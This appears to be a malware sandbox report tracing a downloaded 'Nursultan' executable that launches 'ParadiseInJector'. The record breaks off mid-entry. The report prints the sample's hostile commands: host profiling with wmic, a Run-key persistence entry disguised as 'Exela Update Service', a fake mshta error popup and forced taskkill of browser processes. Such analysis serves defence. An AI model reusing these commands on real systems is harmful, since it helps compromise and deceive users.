PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3544	6024	msedge.exe	88
PID 6024 wrote to memory of 3740	6024	msedge.exe	89
PID 6024 wrote to memory of 3740	6024	msedge.exe	89
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90
PID 6024 wrote to memory of 3568	6024	msedge.exe	90

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://ify.ac/1YYx
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:6024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0xc8,0x134,0x7fff8cd446f8,0x7fff8cd44708,0x7fff8cd44718
  2⤵
  PID:3796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2
  2⤵
  PID:3544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  - Suspicious behavior: EnumeratesProcesses
  PID:3740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
  2⤵
  PID:3568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:3708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:2980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
  2⤵
  PID:2824
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6024 /prefetch:8
  2⤵
  PID:5560
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6024 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
  2⤵
  PID:3864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1
  2⤵
  PID:6056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
  2⤵
  PID:5432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:1
  2⤵
  PID:2256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6896 /prefetch:8
  2⤵
  PID:5604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
  2⤵
  PID:2672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
  2⤵
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5744 /prefetch:8
  2⤵
  PID:636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1712 /prefetch:8
  2⤵
  PID:4980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1
  2⤵
  PID:3240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2272 /prefetch:1
  2⤵
  PID:2408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,10797912947896154038,13406298001079579836,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1300 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1972

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4876

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1212

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7fff7ba6cc40,0x7fff7ba6cc4c,0x7fff7ba6cc58
  2⤵
  PID:1800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2004,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=2000 /prefetch:2
  2⤵
  PID:5560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1940,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=2032 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  PID:928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=2464 /prefetch:8
  2⤵
  PID:3652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:5084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:6064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3684,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4476 /prefetch:1
  2⤵
  PID:4624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4688,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4388 /prefetch:1
  2⤵
  PID:3976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4408,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4680 /prefetch:8
  2⤵
  PID:1408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4848,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4436 /prefetch:8
  2⤵
  PID:2404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4984,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=3184 /prefetch:1
  2⤵
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5164,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=5188 /prefetch:8
  2⤵
  PID:4508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=5236 /prefetch:8
  2⤵
  PID:1764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5076,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4832 /prefetch:8
  2⤵
  PID:1408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3292,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4996 /prefetch:8
  2⤵
  PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4456,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:5456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3128,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=5260 /prefetch:8
  2⤵
  PID:5752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3268,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4884 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4948,i,9088887702597612750,4226510749856472845,262144 --variations-seed-version=20250210-180233.097000 --mojo-platform-channel-handle=4900 /prefetch:8
  2⤵
  PID:1364
- C:\Users\Admin\Downloads\Nursultan (1).exe
  "C:\Users\Admin\Downloads\Nursultan (1).exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3468
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\816.tmp\817.tmp\818.bat "C:\Users\Admin\Downloads\Nursultan (1).exe""
    3⤵
    PID:2996
  - - C:\Users\Admin\Downloads\ParadiseInJector.exe
      ParadiseInJector
      4⤵
      Executes dropped EXE
      PID:3740
    - - C:\Users\Admin\Downloads\ParadiseInJector.exe
        
        ParadiseInJector
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4296
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:5912
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:6068
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        Suspicious behavior: EnumeratesProcesses
        
        PID:2956
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        6⤵
        
        PID:476
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4104
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        6⤵
        
        PID:4188
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:4652
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:948
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        6⤵
        
        PID:4472
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4196
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:5748
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4600
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:5340
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"
        6⤵
        
        PID:5088
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f
        7⤵
        Adds Run key to start application
        
        PID:2096
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
        6⤵
        
        PID:5836
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
        7⤵
        
        PID:1620
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:6104
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4544
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3796"
        6⤵
        
        PID:5840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3796
        7⤵
        Kills process with taskkill
        
        PID:4356
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5080"
        6⤵
        
        PID:5084
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5080
        7⤵
        Kills process with taskkill
        
        PID:2080
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1800"
        6⤵
        
        PID:4284
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1800
        7⤵
        Kills process with taskkill
        
        PID:2272
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5560"
        6⤵
        
        PID:2100
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5560
        7⤵
        Kills process with taskkill
        
        PID:1504
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 928"
        6⤵
        
        PID:6072
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4104
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 928
        7⤵
        Kills process with taskkill
        
        PID:5040
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3652"
        6⤵
        
        PID:2540
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3652
        7⤵
